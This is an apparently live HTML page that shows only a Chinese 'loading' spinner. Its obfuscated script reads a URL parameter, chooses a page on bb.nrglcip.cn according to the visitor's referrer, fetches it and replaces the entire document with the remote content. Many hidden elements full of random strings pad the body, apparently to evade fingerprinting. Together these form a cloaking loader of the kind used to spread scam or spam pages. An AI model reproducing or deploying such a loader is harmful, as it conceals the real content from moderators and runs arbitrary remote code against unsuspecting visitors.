<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .nbPVZCowc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .nbPVZCowc .wljm3VUoHY0 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .nbPVZCowc .content {
            line-height: 50px;
            text-align: center
        }

        .nbPVZCowc .img {
            width: 100%
        }

        .nbPVZCowc .ubZ0UxhooU {
            text-align: center
        }

        .nbPVZCowc .ubZ0UxhooU span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .nbPVZCowc .ubZ0UxhooU span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .nbPVZCowc .ubZ0UxhooU span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .nbPVZCowc .ubZ0UxhooU span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .nbPVZCowc .ubZ0UxhooU span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .nbPVZCowc .ubZ0UxhooU span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .nbPVZCowc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function qor7UXhUOSRg2(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Gm4aCTY = qor7UXhUOSRg2('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Gm4aCTY +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Gm4aCTY +".html?a=share";
		}
		
        le01Wfn=url+"#"+new Date().getTime();
        le01Wfn && function() {
            $.get(le01Wfn, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>OnrJI6gagNLjtJk1VG6LjPTgdd45THrDtPt4aZjCnVVmMH1DtNeHcjtOvv9d4UjtrIFVAi9FccCq2iU6xzJwvGufbx</p>
<p  style='display:none'>OnrJI6gagNLjtJk1VG6LjPTgdd45THrDtPt4aZjCnVVmMH1DtNeHcjtOvv9d4UjtrIFVAi9FccCq2iU6xzJwvGufbx</p>
<a  href='#' style='display:none'>BJh10yR70Vjgv4Ry8XzXWusljPiNyS6znRqOIdo0XsPhP0ZpkwLVnJZJVR6xs2g6KnYvdeHQ2SN7UiXy4prrs0yTmPeaAXjqvjbn</a>
<div style='display:none'>Gx5pvJQMcpmcOTS632C2DGBk46</div>
<span style='display:none'>ZfE4tFjV9RE92W4XgP2</span>
<li style='display:none' >CfOHOo87FPTdqlKiZpBN7rzT5MIqFmnMhID8ya1a9LgxinVduyxlrWmRkVFhqB6HiH9biZnVPTLA9lr5AN0hXoZD4BLLG89JOEY</li>
<b style='display:none' >A9WcQfrC8mO1cfGu5ehuhdAK0nIqr81MzZZA</b>
<img  src='' style='display:none'>
<p  style='display:none'>OnrJI6gagNLjtJk1VG6LjPTgdd45THrDtPt4aZjCnVVmMH1DtNeHcjtOvv9d4UjtrIFVAi9FccCq2iU6xzJwvGufbx</p><div class="nbPVZCowc">
    <div class="wljm3VUoHY0">
        <div class="ubZ0UxhooU">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>A9B5MSTfP3NaeEz4JAqkGjtFh4R4pwbA4dAEF7hQAhXSIU3mNcCN0jAn4Q5IlF3V0NJh0kI0bI915f7kJj</a>
<ul style='display:none' >GOju4x7DOhMj89wsljsCVI1X20954wtupbxRY1zq3iqbi1</ul>
<b style='display:none' >yYusEiAuqXMUgOHqbdKYAVlYGDODbj7Koe1pdaAGz4wvhUQZwACqc2VuwmCknEHwtn762WxkxEgIrCUhOoUnnjaqmqFqbGAME</b>
<p  style='display:none'>ZhRvcjpGq6v4BOudc2enJFJReGtb9oNy2dRgyaPCaYGahEfOIbtTP00DdbgrC9vImITifCmxCDatO8mVW2Ps7YYjQgqRVg1ya6bkw</p>
<img  src='' style='display:none'>
<p  style='display:none'>ZhRvcjpGq6v4BOudc2enJFJReGtb9oNy2dRgyaPCaYGahEfOIbtTP00DdbgrC9vImITifCmxCDatO8mVW2Ps7YYjQgqRVg1ya6bkw</p>
<b style='display:none' >yYusEiAuqXMUgOHqbdKYAVlYGDODbj7Koe1pdaAGz4wvhUQZwACqc2VuwmCknEHwtn762WxkxEgIrCUhOoUnnjaqmqFqbGAME</b>
<div style='display:none'>QFR29GcFrOShtHkI5eOeL9ExzXKjEA4Mt6ykskCvTeaentLJQQWeMEhtxnnbJs3S8UkEOI2WXGDveElN1cWX</div></body>
</html>